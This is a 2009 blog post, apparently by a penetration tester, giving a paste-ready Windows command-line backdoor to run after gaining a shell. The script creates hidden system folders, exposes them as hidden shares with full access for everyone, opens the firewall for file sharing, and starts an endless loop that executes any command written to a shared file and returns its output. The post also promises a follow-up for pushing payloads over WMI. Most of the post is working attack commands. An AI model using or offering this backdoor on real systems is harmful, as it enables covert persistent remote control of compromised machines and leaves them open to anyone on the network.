Friday, March 13, 2009

Attack Script Part 1

First off let me say that I am going to start posting shorter blogs more frequently. I guess I have been kind of inspired by twitter. Instead of one giant post every month I am going to try to post several smaller posts. I am also going to be using this blog as a sounding board for my upcoming CCIE Security Lab studies. I am going to write down what I encounter and see if anything strikes any readers out their on the net.

We are going to create a back door that we can use over windows file sharing. It will allow you to run any command and have it's output exported into a file. This is an add on to Ed Skodus's for loop that allows this to happen.

So let's say we have popped a shell out of a windows box. Ok pentest is over right? Wrong! we need to use this box as a pivot point to try to go deeper into the network. So what can we do to keep access to this system without introducing any new software into the system?

We start with creating a couple of folders. We want to create these folders in a somewhat inconspicuous location. I usually choose C:\windows\system. So the commands to do this are

mkdir C:\windows\system\input
mkdir C:\windows\system\output

Next we want to hide the two folders. We want to make these folders hidden and system folders. That requires them to unhide both hidden files and protected operating system files to see the folders. To do this we use the following commands.

attrib C:\windows\system\input +H +S
attrib C:\windows\system\output +H +S

Now we want to share the two folders. To do this we use the net share command but we want to share these files with a dollar sign at the end to make sure they aren't visible on the network.

net share input$=c:\windows\system\input
net share output$=c:\windows\system\output


Now the next step is up to you and your rules of engagement . What we want to do is control access to these shares. The easiest way is to give the folders the everyone permission but this might introduce new vulnerabilities into the system. It might be prudent to create a new user on the system and then give that user permission to these folders. It's up to you but for the sake of the example we will use the everyone permission.

echo Y| cacls c:\windows\system\input /P everyone:F
echo Y| cacls c:\windows\system\output /P everyone:F

Next we turn on simple file sharing to make windows share these files the way we want it to. We do this with some netsh fu.

netsh firewall set service type = FILEANDPRINT mode = ENABLE

We now want to dump a command in our commands.txt file. This will be what we echo into to run commands through the backdoor. We want to dump a sample command to this file to make sure our loop is successful. The command is:

echo ipconfig /all > c:\windows\system\input\commands.txt

Now we finally set our loop in motion. This loop takes the commands from commands.txt runs them and then dumps the output to output.txt. The loop looks like the following.

for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output\output.txt & del c:\windows\system\input\commands.txt) & ping -n 2 127.0.0.1

I know this looks like someone threw up on your command line. It works though!! What it does is looks for the commands.txt file. It then reads the file runs the command in the file and deletes the file. It then dumps the output to the output.txt file. It does this every two seconds. So what we have is the following script that can be pasted into a shell.

'make them

mkdir c:\windows\system\input

mkdir c:\windows\system\output

'hide them

attrib c:\windows\system\input +H +S

attrib c:\windows\system\output +H
+S

'share them

net share input$=c:\windows\system\input

net share output$=c:\windows\system\output


'allow everyone into them
echo Y| cacls c:\windows\system\input /P everyone:F

echo Y| cacls c:\windows\system\output /P everyone:F


'enable simple filesharing

netsh firewall set service type = FILEANDPRINT mode = ENABLE


'dump a sample command into commands.txt

echo ipconfig /all > c:\windows\system\input\commands.txt

'Use Ed Skodus's for /L loop

for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output & del c:\windows\system\input\commands.txt) & ping -n 2 127.0.0.1


So you can now copy out the above text and paste it into your shell. If you want to make this a batch file make sure that you change all of the % symbols in the loop to %% then it will work as a batch file.

To make sure it's working after you start the loop use the following command.

type \\(ip-address)\output$\output.txt

You should see the output of ipconfig /all on the screen.

To run a new command we use the following:


echo (command) > \\(ip-address)\input$\commands.txt

Ok so that's it a quick simple and dirty windows command line backdoor.

In the next post I will write a script that uses WMI to copy over any payload you want and the run it. You can use runas command and run the script as a user that you have already compromised. You can then turn the above script into a batch file and run it without having to pop a shell on the machine.

No comments: